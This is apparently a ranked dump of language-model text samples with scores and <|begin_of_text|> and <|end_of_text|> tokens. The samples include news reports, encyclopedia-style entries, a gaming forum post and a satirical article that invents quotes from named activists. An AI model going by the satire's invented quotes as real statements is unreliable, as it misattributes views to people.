socialist� currently occupying the White House. + +But by 1980, U.S. Christian religious leaders had fully thrown in with the Republican political right. And the arrangement has worked out pretty well for both sides ever since. At least until now. + +In the past year, a whole host of polls and studies, including a poll of millennials, the hip new term to describe people born between the early 1980s and the early 2000s, done last month by Pew Research Center, indicates that the culture war � particularly opposition to marriage equality and abortion � is now helping neither Republicans nor Christians. + +The math is simple, and dire, for both sides of that now-traditional alliance. Christians who embrace the Republican platform are migrating to the other side of the grass. Replacing them are a wave of millennials who are OK with gay marriage, pro-choice and in favor of marijuana legalization. + +Only 10 years ago, President George W. Bush won his re-election campaign largely because his campaign strategists got anti-gay-marriage referenda placed on the ballots in key states, chiefly Ohio, which got Christians out to the polls. They stuck around long enough +================================================================================ +Rank = 2; Score = 26738688.0 +<|begin_of_text|>Four months after raising $1,664,574 on Indiegogo and breaking the site’s existing record, medical device developer Scanadu has closed $10.5 in Series A financing led by Relay Ventures, with participation from VegasTechFund and AME Cloud Ventures. + +Embarking on the next stage in taking its first product to market, Scanadu has partnered with Dr. Eric Topol at the Scripps Translational Science Institute to conduct clinical testing on the Scout device, a medical tricorder that measures a host of metrics like blood pressure and heart rate. Those trials are set to begin in Q1 of 2014. + +While Scanadu is equipping the Scout with off-the-shelf sensors, each needs a 501(k) clearance from the FDA, as do any groups of sensors working in conjunction with each other. That’s the whole point of the Scout: it combines existing trackers into one handy device. + +“This is a device that comes out of nothing,” Scanadu CEO Walter De Brouwer said. “There was nothing that you could build on. You put all sorts of sensors together in a small package and make it do stuff that it hasn’t done before.” + +The goal is to have the commercial device available to consumers by the winter of 2014 or Q1 of 2015. Before that, the Scout will ship to the 8,000 people who preordered through the Indiegogo campaign in March. Scanadu will be doing usability testing on volunteers from that cohort in order to glean how exactly consumers will use the Scout: how many times a day they check it and what metrics they are most interested in tracking, for instance. + +The Scout will work with a companion app, which functions as a medical record populated by data taken by the device. As consumers are encouraged to take a more active role in their health — especially with regard to disease prevention — it’s a way to look at various metrics over time. + +The app can also provide recommendations on what tests people might want to pay closer attention to. If one person is checking his blood pressure and cholesterol, Scanadu can inform him that people checking those metrics are also watching their heart rate, and perhaps he should look at that, too. + +“Infection was one of our old enemies. We now have that under control,” De Brouwer said. “The 21st century enemy is cardiovascular disease. Replacing the thermometer with a device that tests blood pressure, diastolic pressure, your ECG, heartrate, and records and analyzes that +================================================================================ +Rank = 3; Score = 25165824.0 +<|begin_of_text|>Using the River for Transportation + +» Can ferries play a useful role in the broader public transportation system? + +Most major cities are situated along some body of water — usually a river or two, often a lake or the ocean. There’s a good reason for this: waterways played an important role historically as transportation links for people and freight. They also allowed connections across barriers insurmountable by ground-based transportation; in the early 1900s, for example, ferries were the only mode of transport between Manhattan and Northern New Jersey. But new technologies allowing the construction of underwater road and rail tunnels and the general improvement of ground-based transportation systems have reduced the importance of boats for the average commuter in the urban environment. + +In some cities, of course, the ferry never died out as a transportation mode — Venice’s Vaporetto water bus continues to be the primary mode of transit in that pedestrian city; in North America, both Seattle and Vancouver have extensive operations because of their water-bound geography. But for the most part, cities that grew up around their respective rivers have come to ignore them as potential corridors for transit service, citing the slow speed of water-bound travel and the difficulty of getting from the waterfront to business or residential districts. + +Yet the transformation of many inner-city waterfronts from industrial zones to parks surrounded by walkable dense neighborhoods has reawakened an interest in using boats for transportation operations. With water views and fresh air, water taxis could be an appealing alternative to more mainstream forms of transit. The news this week that a company called American River Taxi plans to begin transit operations later this year between several of Washington, D.C.’s major waterfront zones is only the latest example of such an initiative. + +The Potomac Riverboat Company currently operates a route between Alexandria and National Harbor. + +Boats provide a unique opportunity to improve urban transportation because their use requires very little construction spending: unlike trains or buses, they can take advantage of a natural resource to move about, rather than having to rely on a built rail or road route. The only capital expenses required are in the erection of ferry terminals and the purchase of the boats themselves. Replacing some ferry routes with bridges or tunnels for ground-based transportation would cost billions of dollars. + +From this perspective, the investment in new boat routes between Georgetown, the Southwest Waterfront, the Navy Yard, Alexandria, and National Harbor could provide significant new connections to areas of the Washington region that don’t have direct transit links today. Each of these neighborhoods has seen significant redevelopment over the past decade, already +================================================================================ +Rank = 4; Score = 23592960.0 +<|begin_of_text|>TRADE unions and other organizations picketed today the Hyatt Hotel and Casino Manila in the Malate area to air their support to the global campaign to boycott the Hyatt chain of hotels prompted by the rampant abuses against the workers in several Hyatt hotels in the US, even as they recall the almost similar plight suffered by the workers in the shuttered Hyatt Regency Manila. + +Branded as America’s “worst employer in the national hotel industry,” Hyatt is accused of “replacing longtime employees with minimum wage temporary workers and imposing dangerous workloads on those who remain,” adding that “Hyatt housekeepers have high rates of injury.” + +What incited the Hyatt workers, after years of silence, to finally confront their employer was when all the housekeepers at three non-unionized Hyatt hotels in Boston, Massachusetts – Hyatt Regency Boston, Hyatt Regency Cambridge, Hyatt Harborside – were arbitrarily fired (with no advance notice) and replaced by temporary workers on August 31, 2009. + +Called “The Hyatt 100,” the dismissed workers – some of them had worked for Hyatt for over 20 years – earned widespread support from the public and civil society organizations, led by the unions, and even from various religious groups, politicians and businesses. + +The Boston protests may have inspired workers in other Hyatt hotels in the US to later raise their grievances and assert their rights, including those in Chicago, Illinois; Indianapolis, Indiana; San Antonio, Texas; Scottsdale, Arizona; Santa Clara, San Francisco and Long Beach in California; and Seattle, Washington. + +The hyatthurts.org website explained that Hyatt’s subcontracting is actually “destroying good jobs and exploiting immigrant workers,” who are either deceived or forced to take jobs with much lower pay and without security of tenure. + +It added that Hyatt housekeeping staffs comprise one of the most abused hotel workers in the US. For instance, they had the highest injury rate among housekeepers, according to a study – on 50 hotel facilities from five different hotel firms – published by the American Journal of Industrial Medicine. + +Housekeepers or room attendants at some Hyatts have also excessive workloads as they have to clean as many as 30 rooms a day or “as little as 15 minutes” per room. Violations of occupational safety and health standards are also increasing; thus, last year, 11 Hyatt hotels were slapped with 18 citations, and three against one of Hyatt’s housekeeping subcontractors. + +Lik +================================================================================ +Rank = 5; Score = 22282240.0 +<|begin_of_text|>A Progressive Conservative vice-president has resigned in protest from the party executive after officials glossed over a questionable nomination amid allegations of ballot-stuffing, the Star has learned. Robert Elliott quit as the Tories’ third vice-president and policy chair after a raucous weekend meeting of PC brass in Toronto, where leader Patrick Brown was given the power to rubber-stamp contentious candidates. + +Robert Elliott quit as the Tories' third vice-president and policy chair after a meeting of PC brass in Toronto on the weekend. ( SUPPLIED PHOTO ) + +“It did happen, but with respect to it I have no further comment,” Elliott, a consultant with Temple Scott Associates, said Monday from Ottawa. “I understand you have a job to do and I appreciate that — I know your work — but I don’t have any further comment,” he said politely. Conservative insiders said Elliott — a party vice-president for the past nine years and the chief returning officer for the 2015 PC leadership contest won by Brown — was troubled by alleged shenanigans in Ottawa West-Nepean. + +Article Continued Below + +In the May 6 nomination race there, Karma Macgregor won by 15 votes over runner-up Jeremy Roberts, even though there were 28 more ballots in the boxes than had registered. Roberts, whose formal appeal of the result was rejected by the party executive Saturday, said the contest “contained highly suspect irregularities.” “There were clear indications of fraud undertaken,” he said in a statement, noting “the events that transpired here send a very dangerous and potentially damaging message about our cause.” Macgregor, a veteran Tory activist and the mother of Brown’s deputy chief of staff, could not be reached for comment. Despite the shambolic nomination in Ottawa — and similar problems in Hamilton West-Ancaster-Dundas and Newmarket-Aurora — the party executive opted against holding new contests. + +“As you know, there have been concerns raised about due process in a handful of nomination contests. They’ve elevated quickly,” PC Party president Rick Dykstra said in an internal email obtained by the Star. “Unfortunately, there is no procedural answer that will satisfy everyone. Replacing one appellant with another is not productive. There could be endless appeals,” he wrote. + +Article Continued Below + +“Rather than constantly looking in the rear-view mirror, we simply need to move forward...” Dykstra pointed out that the party is implementing “new processes... designed to make nominations and appeals more transparent and fair and to ensure full and fair compliance with +================================================================================ +Rank = 6; Score = 22282240.0 +<|begin_of_text|>REPEAL REJECTED: New Hampshire Sticks With Marriage Equality + +A Republican-led effort to repeal marriage equality in New Hampshire + +decisively failed today. Lawmakers voted against the repeal, against + +replacing marriage with civil unions, and against putting marriage + +rights up to a voter referendum. + +Just to ensure the message + +was clear, Republican representative Seth Cohn, who supports marriage + +equality, proposed banning marriage between left-handed people. That + +didn't pass either. + +The final vote was 211-116 to kill a bill + +that would have rescinded marriage equality in the state, and the votes + +against the repeal included several Republicans, such as Cohn, who + +broke with their party. + +Gov. John Lynch signed marriage equality + +legislation in 2009 after it narrowly passed through the legislature, + +and he has promised to veto any effort to repeal the law. It would have + +needed to pass through both Republican-led chambers before reaching his + +desk. + +But the bill, introduced by state representative David + +Bates, couldn't muster the votes to pass the House, let alone come + +anywhere near the two-thirds majority needed to override a veto. + +Bates had also sought a referendum but lost that vote 162-188. Polling on the issue showed that a solid majority of New Hampshire residents opposed rolling back marriage rights for gay residents. And marriage supporters argued that it was their role, not voters', to make a decision on repeal. + +It wasn't the first time marriage opponents had tried to put the question on a ballot. House members voted against a similar initiative in 2010, failing to reach the 60% of members' votes to add the initiative to the ballot. + +"Our opponents tried to abuse the 2010 Republican legislative sweep in New Hampshire to repeal the popular law," said Marc Solomon, Freedom to Marry’s national campaign director. "What they didn’t count on was the fact that the freedom to marry is becoming a bipartisan value, as resoundingly reflected in today’s vote."<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 7; Score = 21757952.0 +<|begin_of_text|>The Sims is a series of life simulation video games developed by Maxis and published by Electronic Arts. The franchise has sold nearly 200 million copies worldwide, and it is one of the best-selling video games series of all time.[1] + +The games in the Sims series are largely sandbox games, in that they lack any defined goals (except for some later expansion packs and console versions which introduced this gameplay style). The player creates virtual people called "Sims" and places them in houses and helps direct their moods and satisfy their desires. Players can either place their Sims in pre-constructed homes or build them themselves. Each successive expansion pack and game in the series augmented what the player could do with their Sims. + +Development [ edit ] + +Will Wright + +Game designer Will Wright was inspired to create a "virtual doll house" after losing his home during the Oakland firestorm of 1991 and subsequently rebuilding his life.[2][3] Replacing his home and his other possessions made him think about adapting that life experience into a game. When Wright initially took his ideas to the Maxis board of the directors, they were skeptical and gave little support or financing for the game. The directors at Electronic Arts, which bought Maxis in 1997, were more receptive—SimCity had been a great success for them, and they foresaw the possibility of building a strong Sim franchise.[2] + +Wright has stated that The Sims was actually meant as a satire of U.S. consumer culture.[4] Wright took ideas from the 1977 architecture and urban design book A Pattern Language, American psychologist Abraham Maslow's 1943 paper A Theory of Human Motivation and his hierarchy of needs, and Charles Hampden-Turner's Maps of the Mind to develop a model for the game's artificial intelligence.[2] + +Games [ edit ] + +Main series [ edit ] + +The Sims [ edit ] + +The Sims is the first game in the series. Developed by Maxis and published by Electronic Arts, it was released for Microsoft Windows in February 2000. The game uses dimetric projection and features open-ended simulation of the daily activities of one or more virtual persons ("Sims") in a suburban area near SimCity. Seven expansion packs and two deluxe editions with exclusive content have been released. It was repackaged in several different formats, and different versions of it were released on several different platforms. By March 22, 2002, The Sims had sold more than 6.3 million copies worldwide, surpassing Myst[5] as the +================================================================================ +Rank = 8; Score = 21233664.0 +<|begin_of_text|>This article is about the singer. For other uses, see Morrissey (disambiguation) + +Steven Patrick Morrissey (; born 22 May 1959), known mononymously as Morrissey, is an English singer, songwriter, and author. He came to prominence as the frontman of the Smiths, a rock band active from 1982 to 1987. Since then, he has pursued a commercially successful solo career. Morrissey's music is characterised by his baritone voice and distinctive lyrical content featuring recurring themes of emotional isolation and sexual longing, self-deprecating and black humour, and anti-establishment stances. + +Born in Davyhulme, Lancashire, to a working-class Irish migrant family, Morrissey grew up in Manchester. As a child he developed a love of literature, kitchen sink realism, and pop music. In the late 1970s, he fronted punk rock band the Nosebleeds with little success before beginning a career in music journalism and authoring several books on music and film in the early 1980s. With Johnny Marr he formed the Smiths in 1982, soon attracting national recognition for their eponymous debut album. As the band's frontman, Morrissey attracted attention for his trademark quiff and witty and sardonic lyrics. Deliberately avoiding rock machismo, he cultivated the aesthetic of a sexually ambiguous social outsider who embraced celibacy. The Smiths released three further studio albums—Meat Is Murder, The Queen Is Dead, and Strangeways, Here We Come—and had a string of hit singles. The band were critically acclaimed and attracted a cult following. Personal differences between Morrissey and Marr resulted in the separation of the Smiths in 1987. + +In 1988, Morrissey launched his solo career with Viva Hate. This album and its follow-ups—Kill Uncle, Your Arsenal, and Vauxhall and I—all did well on the UK Albums Chart and spawned multiple hit singles. Replacing Marr, he took on Alain Whyte and Boz Boorer as his primary co-writers. During this time his image began to shift into that of a burlier figure, who toyed with patriotic imagery and working-class masculinity. In the mid-to-late 1990s, his albums Southpaw Grammar and Maladjusted also charted but were less well received. Relocating to Los Angeles, he took a musical hiatus from 1998 to 2003 before releasing a successful comeback album +================================================================================ +Rank = 9; Score = 21233664.0 +<|begin_of_text|>Examining the EPA Cave-in: Does the Broken Window Fallacy Apply? + +Did President Obama get the economics wrong earlier this month when he abandoned stricter air-quality rules, wagering environmentalist loyalty in a bid to avoid job losses from strict new ozone standards? Paul Krugman thinks so, calling the decision to wave off the EPA a “lousy decision all around.” But is Krugman right? + +The short-run job-creating move, Krugman contends, would have been for Obama to promulgate the new ozone regulations, which would have forced firms in hundreds of counties across the country to replace and upgrade capital in order to comply with new, stringent pollution abatement requirements. He asserts that because the U.S. economy is in a liquidity trap, wherein conventional monetary policy is insufficient to induce firms to spend, the regulations could have accomplished what the Fed cannot. In such a “world of topsy-turvy,” as Krugman says, the usual rules of economics are thrown out, and even the “Broken Window Fallacy” ceases to hold. + +The 19th century French theorist Frederic Bastiat cautioned against concluding that a shopkeeper’s broken window is a good thing because it induces him to employ a glazier to repair the window. Such a conclusion ignores that which is unseen: that the shopkeeper would have employed the shoemaker to replace his worn out shoes had the window not been broken. Hence, the broken window doesn’t increase employment or grow wealth. In fact, it shrinks wealth, leaving the shopkeeper worse off than if he had been able to replace his worn out shoes for the cost of the new window. The deliberate destruction of windows, then, would assuredly be poor economic policy in normal times because it trades wealth-creating spending for wealth-replacing spending. + +But what happens in unusual times, like those of a liquidity trap? Krugman contends that shopkeepers are sitting on stockpiles of cash and not spending. So the shopkeeper’s expenditures to replace broken windows won’t crowd out expenditures on shoes since he wasn’t going to purchase shoes in the short run anyway. So, too, Krugman reasons, forced investments on pollution abatement won’t crowd out other investments since they’re not happening anyway. Thus a policy of capital destruction to spur economic activity, like breaking windows or using regulatory fiat to mothball functional equipment, may never make more sense than during a liquidity trap. But that doesn’t mean it makes sense even then. + +Let us consider the employment and +================================================================================ +Rank = 10; Score = 19791872.0 +<|begin_of_text|>If a Republican wins the 2016 election and “replaces even a single liberal justice with a conservative,” the United States will end up with “a democracy of the corporations, by the corporations, and for the corporations,” according to a law professor. + +In a recent op-ed for The Xenia Gazette, Jamie Raskin, a professor of Constitutional Law at American University and Maryland State Senator who is currently running for U.S. Congress, notes that four of the U.S. Supreme Court’s justices are over the age of 80 and that the next president could have the chance to replace all of them. + +"Will the new justices bolster the conservatives, who favor legislative power only when it violates minority rights, or the liberals, who have demonstrated a serious commitment both to voting rights and to the legislative process?" + +“Will the new justices bolster the conservatives, who favor legislative power only when it violates minority rights, or the liberals, who have demonstrated a serious commitment both to voting rights and to the legislative process?” + +Raskin decries the conservative dissents in the Obergefell v. Hodges same-sex marriage decision, singling out Scalia’s dissent for calling the ruling “a threat to American democracy.” + +The phrase would have been more accurate, he said, had it been used in Citizens United, Shelby County v. Holder, or Bush v. Gore. + +He argues that Scalia and Roberts “pose as outraged populists regarding marriage equality” who “pretend, ludicrously, that they don’t believe in the court reviewing and invalidating popularly enacted laws.” Yet they have “no problem with nullifying laws that implement affirmative action, produce majority-minority legislative districts, or exclude corporations from spending money in political campaigns.” + +“What a joke,” Raskin wrote. “These so-called conservatives strike down almost any law that curtails the power of corporations. They just don’t like the idea of equal protection and due process applying to people.” + +Raskin did not respond to Campus Reform’s request for comment. + +Follow the author of this article on Twitter: @Geedelman<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 11; Score = 19660800.0 +<|begin_of_text|>Puzzle adventure Rime launches on Switch this week - today in North America, on Friday in the UK - but there are concerns surrounding its performance on Nintendo's handheld. + +Previews have shown the game to sometimes display a choppy frame-rate, and include long loading times. When I played the game back in September at EGX, both were noticeable (you can see footage of me playing the preview build below). + +Last night, in a reddit AMA, Rime developer Tequila Works spoke about the technical challenges it faced when bringing the game to Switch - and the compromises it decided to make. + +"Rime runs at 30fps in 720p throughout most of the game while docked," Tequila Works wrote. "This is a considerable improvement from where the game was at earlier this year when we announced the first delay. + +"With Rime being very open in many locations, it's incredibly difficult to get these level segments small enough to not cause a hiccup in performance. We were faced with the choice of adding loading screens throughout the stages, rebuilding the game completely to be more closed in (undermining the product vision in the process), or living with these small hiccups to preserve what the game was intended to be. We chose the latter. + +"When looking at the handheld mode, we had to make a choice between lowering the resolution, removing/replacing major parts of the level geometry, or having a bigger hit in performance. We decided to go for the former, because it allows us to maintain the integrity of the gameplay experience. All the important details are still very visible, and we've had no issues playing the game in handheld mode ourselves." + +Tequila Works concluded by noting Rime did have similar issues on other platforms, albeit less pronounced. + +But the fact Rime runs worst on Switch is particularly frustrating as a copy of Rime on Switch costs more than other platforms. On Amazon UK right now, a PS4 or Xbox One physical copy costs £25. On Switch, a physical copy from Amazon UK costs £32. + +It's less than the expected cost of the game - which was initially set as £39.99 back in March, before the Switch port was delayed. + +For digital copies, the prices are closer. On the Microsoft Store a digital download costs £23.99, while on both the PlayStation Store and Nintendo Switch eShop, it costs £29.99. + +Are you picking up Rime for Switch? Is the added portability of the game worth a lower performance? Let us know.<|end_of_text|><|end_of_text|> +================================================================================ +Rank = 12; Score = 18743296.0 +<|begin_of_text|>The boss of one of Scotland’s leading theatres has quit days after a damning article in The Scotsman raised serious concerns over how it is being run. + +Nick Parr has resigned after just two years as chief executive of Dundee Rep, which boasts the country’s only full-time company of actors. + +He has left with immediate effect less than two months after the Rep’s new artistic director, Andrew Panton, took charge of his first show. He has quit his role, which also saw him in charge of Scottish Dance Theatre, weeks before Dundee bids to become 2023 European Capital of Culture. + +Earlier this year Mr Parr had hailed the financial performance of Dundee Rep and Scottish Dance Theatre, including rises in turnover and operating profit, and a 17 per cent boost at the box office. + +However Kirsty Gunn’s opinion column in The Scotsman last Monday told how the company had been left “devastated and depressed” by cuts in its production department. She raised concerns of a growing culture “replacing creativity with bureaucracy, artists and intellectuals with managers”. + +Mr Parr arrived at the Rep, which dates back to 1939, in September 2015 after previously working as commercial director at a trust running the Festival Theatre and King’s Theatre in Edinburgh. + +It was the first time Dundee Rep had decided to split the post of chief executive and artistic director. However, the then holder of the latter post, Jemima Levick, announced her departure to another theatre company, Stellar Quines, less than six months later. + +Mr Panton, who was allowed to combine his Dundee Rep role with an existing job as artistic director of musical theatre at the Royal Conservatoire of Scotland in Glasgow, has been appointed interim joint chief excutive of the theatre, along with SDT’s artistic director, Fleur Darkin. + +An official statement said: “Nick Parr has left his role as chief executive of Dundee Rep and Scottish Dance Theatre Ltd to pursue other opportunities. Andrew Panton and Fleur Darkin have been appointed interim joint chief executives.” + +Ed Troughton, chair of the board, said: “We would like to thank Nick for his hard work and we wish him all the best. Andrew and Fleur will work with a strong and experienced senior management team to lead the organisation, and will report directly to the board. + +“The other trustees and I are currently reviewing the structure and governance of the organisation to ensure we are in the strongest possible position for the future.” + +Joyce McMillan, The Scotsman’s theatre critic, +================================================================================ +Rank = 13; Score = 16449536.0 +<|begin_of_text|>YANGON (Reuters) - Myanmar’s ruling military changed the country’s flag, national anthem and official name on Thursday, just over two weeks before the country’s first election in 20 years, state media said. + +The new state flag of the Republic of the Union of Myanmar is hoisted at the mast at the City Hall of Yangon, former capital and commercial city of Myanmar, October 21, 2010. REUTERS/Aung Hla Tun + +The changes were outlined in a new constitution published in 2008 but the government had not announced a date for their introduction. + +The country’s new name is the Republic of the Union of Myanmar, instead of the Union of Myanmar. + +The military, which has ruled since a 1962 coup, changed the country’s name in English from Burma to Myanmar in 1989, a year after widespread protests against military rule were crushed, and a year before the last election. + +That election was won by the party of pro-democracy leader Aung San Suu Kyi but the military ignored the result. Suu Kyi has spent 15 of the past 21 years in detention. + +The new flag has a horizontal band of light green at the top, dark green in the center and red at the bottom, with a white star in the middle. There has been no official explanation as to what the colors or the star represent. + +Nor has there been any explanation as to why the changes, which include a new state seal, were being made. + +Officials in various government departments told Reuters they were ordered to change the flags. + +“We were caught by surprise when we got the order at short notice. There was also an order that the old flags must be burned,” said one official who declined to be identified. + +The order stipulated that the old flag had to be lowered by someone born on a Tuesday and the new flag had to be raised by someone born on a Wednesday, he said. + +“It must have been instructed by astrologers,” he said. + +Myanmar’s secretive military rulers, who will retain ultimate power no matter who wins the November 7 parliamentary election, are widely believed to consult astrologers. + +Several dozen passers-by watched the formal ceremony to change the flags at Yangon City Hall. + +One, who declined to be identified, said the change was akin to putting old wine in new bottles: “The label has changed but what is really needed is a change of the wine.”<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 14; Score = 15663104.0 +<|begin_of_text|>NASA’s next major space observatory is meant to tackle some of the biggest questions in astronomy when it launches in 2025—including what exoplanets look like and how dark energy is driving the Universe’s expansion. But the project’s cost is rising quickly, and NASA managers are struggling to keep its budget in check. + +The Wide-Field Infrared Survey Telescope (WFIRST) has grown in scope and complexity since it was proposed nearly a decade ago, and its price has swollen from US$1.6 billion in 2010 to the current estimate of $3.2 billion ($2.4 billion in 2010 dollars). That has raised concern at NASA, which in April commissioned a review by independent aero-space experts. Their report is due in the next few months. + +Above all, the agency wants to keep WFIRST from following the path of the James Webb Space Telescope (JWST), a successor to the Hubble telescope that is scheduled to launch in 2018. That project’s cost spiralled from $1 billion in the early 2000s to $8.8 billion—and nearly exhausted NASA’s astrophysics budget. + +The WFIRST review is meant to stave off that kind of meltdown. “This is a good time to take a look at the scale and scope of the mission,” says Jon Morse, a former head of NASA’s astrophysics division who is now chief executive of the BoldlyGo Institute, a non-profit space-exploration organization in New York City. “Nobody wants this thing to double in cost.” + +Bonus features + +WFIRST was the top-ranked big space mission in the 2010 decadal survey in astronomy and astrophysics, a list created by researchers to prioritize projects for the next ten years. Then the National Reconnaissance Office gave NASA a 2.4-metre mirror—replacing WFIRST’s planned 1.5-metre mirror—and the space agency started dreaming big. The larger mirror allowed NASA to add a corona-graph, an instrument that studies exoplanets by blocking light from the stars they orbit. + +And NASA made other design changes to go along with the big mirror. It also began to consider adding a ‘starshade’, a free-floating umbrella-like spacecraft that would fly alongside WFIRST and block enough light for the telescope to spy Earth-sized planets. + +WFIRST’s heart is a gigantic camera with 18 detectors, each capable of capturing a 16-mega-pixel shot—giving it a field of view 200 times Hubble +================================================================================ +Rank = 15; Score = 14286848.0 +<|begin_of_text|>Mithost said: My intention from posting my original reply was not to immediately unban the controllers, but to get more information from those in charge on what the current barriers are. If you don't mind me asking, what are some examples of the logistical issues you mention? + +Outside of Smash, I am an active member of the wider fighting game community. At both local tournaments and large scale events, I have seen people play with everything from a PS1 gamepad with a converter to a pizza box with 20+ buttons on it without any issues. Controller configurations that prove to be problematic from a logistical or competitive point of view are banned when they prove to be problematic at an event (most wireless controllers, turbo buttons, and certain buggy platform converters). If a community so similar to our own in terms of logistics can run well with very lax controller rules, what is different about Smash that changes the logistics enough to warrant banning the controllers? Click to expand... + +The main difference between Melee and other FGs, as I'm sure you know, is the use of analog controls. Replacing left, right, up, and down with digital buttons is not a huge change for the average FG. For Melee, being able to hit precise angles is obviously a very powerful technique. Whether it's for perfect up-B angles, airdodges, wavedashes/wavelands, or DI, hitting specific angles is a skill that has been an inherent part of the game since its inception. If you have a controller that can do all of this for free, you're removing skill from the game and creating an unearned skill gap between the players who use a custom controller vs. the standard. Hax himself has admitted that his perfect wavedash angles were obnoxiously good, so he has attempted to mitigate this advantage by preventing perfect angles on the B0XX. There are plenty of other issues, such as multiple SDI inputs. Due to the nature of a button vs. a stick, you can easily double/triple tap fightstick buttons to get multiple SDIs. I'm not very experienced on a fightstick, but it still only took me a few minutes of testing to get 3 inputs in a 5 frame window. This kind of capability would result in people triple SDIing shines, and would greatly ruin the integrity of the game.All of these advantages that make custom controllers able to perform things that are normally difficult or impossible would have to be limited before these controllers could be allowed. That means TOs have to decide how good +================================================================================ +Rank = 16; Score = 14286848.0 +<|begin_of_text|>FEATURED ARTICLE + +Organizers of the former Montreal Anarchist Bookfair are celebrating their new identity after they renamed themselves The Bourgeois Feminist Bookfair. “We realized that we’re not an anarchist collective after all,” says activist and bourgeois neo-liberal feminist Lucy Descharnes. “We don’t care about anarchism, we don’t care about the working class, and we don’t care about economic issues. Our main interest is in protecting the privileges of wealthy university graduates, so we decided to change the name of our organization to better reflect our actual values. We’re bourgeois, we're educated, we're affluent, and we're proud of it."Anarchists across Montreal say that they’re not surprised by the name change. “I can’t remember the last time the anarchist bookfair actually catered to genuine anarchists,” says working class activist Jesse Hogan. “It’s been a giant bourgeois shit show for the last decade. Last year took the cake, though, after they gave white and affluent academic feminists the power to ban men from attending the event. Seriously, if a wealthy educated feminist didn’t like you, you couldn’t attend. All she had to say was that you made her feel uncomfortable. The organizers justified their actions because they believe that working class men have more power and privilege than bourgeois feminists. I’m not comfortable with bourgeois feminists being anywhere near me, but the bookfair doesn’t care about creating a safe space for the working class. Safe spaces only exist to protect the bourgeoisie from the rabble."Lucy agrees. “At the end of the day, a wealthy white woman with a Ph.D from Concordia is far more oppressed than a working class man who was born into poverty,” says Lucy. “At the Bourgeois Feminist Bookfair, we believe in intersectional feminism, which is the religious conviction that oppressions intersect in a way that minimizes and erases class privilege. For example, if you’re a poor homeless man, your penis gives you way more privilege than Martha Stewart or Michelle Obama. A homeless man’s male privilege intersects with his poverty, erasing it’s very existence from the face of the earth. Bourgeois feminists recognize that class is irrelevant — it’s the least important factor in oppression. We also believe in the one drop rule: if you have a single drop of non-economic privilege, that privilege erases the economic factors in your life. You’re white? Your class doesn’t matter. You're a man? Your class doesn’t matter. You’re straight? +================================================================================ +Rank = 17; Score = 13893632.0 +<|begin_of_text|>Electron Microscopy images of 1.9 and 3.3 Terabit/inch2 densities + +Hard drive storage continues to increase at a steady rate, but just how long can we keep squeezing more data on to those platters? TDK has managed to ensure that the density keeps rising for a few more generations with its HAMR head innovation, but that may have already been rendered redundant through another discovery by a Dr Joel Yang at the Institute of Materials Research and Engineering (IMRE). + +Existing hard drives max out at 3TB at the moment. TDK’s HAMR promises to take that to 6TB, but Dr Yang has found a way to increase the data density of a drive to 3.3 Terabit/inch2, effectively meaning 18TB hard drives are possible. + +What may surprise you is the key to this massive increase in data storage density. Dr Yang used table salt, or more specifically, sodium chloride. + +Data stored on a hard drive is done so using nanoscopic magnetic grains. Typically, several of these grains (a cluster), each measuring around 7nm, are used to store one 